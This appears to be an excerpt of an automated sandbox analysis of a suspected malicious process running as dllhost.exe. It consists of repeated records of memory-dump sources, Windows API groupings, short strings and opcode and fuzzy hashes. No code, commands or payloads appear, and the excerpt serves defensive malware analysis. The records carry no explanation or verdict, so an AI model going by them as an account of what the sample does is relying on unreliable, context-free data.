                                                  • Instruction Fuzzy Hash: F302D736219BC086E7608B55E49039EB7A1F3C47A4F548129FE8E87BA9EB79C455CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: 43a1995342a3eb3f23106359947521dfe8bf1effa722fabd5521a91ea6c549e9
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 2A518035204681D7E368DB16E840A9E73A2F7C8B84F58413DBD5A43756EF39C947CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: 1178fdf8d8954ef988ab2be2e224426c00eb83783ef7c0080722dbcf3cf589d9
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 6F51C5392146C187E328CB16E85069E73A2F7C8BA4F98C03DBD5A43756EF79C546C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: 584fdf4f84cb192f3556b49f2bc5f54810af97449ee10246d2abf8aec6c68b27
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 4F517C36214681D6E728CF16E840A9E73A6F7D9B84F58412DFE6A43756EF39C847CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: 97da8118d1bc94e9f1c99c563b5c338195179db9073c1e595c8c7109375059f6
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 955183392146C186E728CF16E85069E77A2F3C9BA4F48C12DFD5A43756EF79C846CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: 8268af90b495cfb2adc0fec921f304235cdd54dcc77b46ccd6fb1384db5bddf0
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: D561C636129B84D6E760CB15E45079EB7A2F3C8B44F14412AFE8D47BAAEB7CC542CB04
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: a0d4323661e31b6c24e6abaafc349a47004d6a02bf54f1d39b5ce827369747df
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: B561E83A129BC086E760CB55E44035EB7A2F3C8758F55C12AFF8D47BA9EB79C5418B04
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: cffd1fbd56c9c95b59e923d043c04ee05b4a4bb50f3c1552dca39796f5f486cf
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 6B110A36605780A3EB24CB21F44469E67B1FB89B80F08403AFE4D037A5FB6DC9568784
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 7cfe7554f941fbd5b367065fae7e79dcc4f415f66e0cd49808874d915f92cc81
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: D6110A3A6057C093EB248F21E44429E67B1FB85B94F48C03AFE4D037A5FB6EC9568784
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: e80d129308763868ed1064e24069be532945dd88132d2db73d21307722edc7fd
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 9651A332311680ABDB54DB25E444BAC7793F794B98F588139FE4A4779AFB78C842C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 6b6d007ddbd97d1147ff4583451adbdc8cf453512616ae467a66ee54ab1f90cb
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: BE51933A3216C08ADB54CB15D4447AC7793F794BA8F98C139FE498778AE77AC842C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 5253ce4b0ab5c783c819a681e85f89979cd63a3d05fd26d82592a625e390e4e6
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: F2516B362007C0ABEB748F22D54439C77A6F395B94F18412AEE9947FD6EB38C492CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: d01713d7866439f433d04bf9c4d385755454d4f036a3481f93411054f2e5b170
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 1D619D72508BC495EB218F15E4407DEB7A1F7D5B98F084229FF9813B9AEB78C192CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 6c8d2704c497561334c91a39e584da804b581c2ee66e21f153cd8c06178d1d5c
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 12618F76508BC481DB208B15E4403DEB7A1F7C5BA8F88C629EF9813B96EB79C195CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 4ae4e5a0f584ff2e0bb065ff78f464e7dbdf4d92b172425049829fc862c41691
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: F951813A1007C08BEB748B12D55439C7B96F794BA4F9CC129EE8947BD6EB3AC452CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000003.2189049157.000001EF091F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EF091F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_3_1ef091f0000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: ed867bf490fe9edb46d23d820971af2e554984b3e8f8f85e870d5ca5af507103
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 25517D333046C88AEB749F11E56439C7BA2F795B94F1C4169EE8E47B96EB38C452CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: f71b0ed643d9ce12423c0c0b3904c660f3e54305a65c5a07b75257575b8e5ad8
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: 11112C313147C1A1EB10DB25E9413DE63A6B7C8B80F98403DBE8983696FF79C906C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 739c27a594544f019f5a91e3a70bf399543559b1d5fe0c4ea777ac803c40adeb
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: 831130393147C191EB109B35E9413DE62A6B7D8BA0FD8C13DBE4983696FF6AC906C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 4dd7bcacb5f4c37088deda0d6b789f621bcdb40bac7c610a056ce2d64a50755a
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: B7D1B032714A9499E711CFA5D5406DC37B2F394B98F48816EEF6DA7B9AEA34C10BC340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 3dc044be511f822cfabf12eaf64e349cb856f500b2bb96619b515d8bc11d722e
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: 66D18D36714AD489E711CFB5D5406DC37B2F394BA8F48C12AEE6DA7B9AEA74C106C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 3da74ff3287f344bcacc237c94d7645f48fb639bdf8b2dede564b841a736576e
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 0601D732614B90DAE714DF66E90499D77A2F789F80B098079FF8D53729EE38D452C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
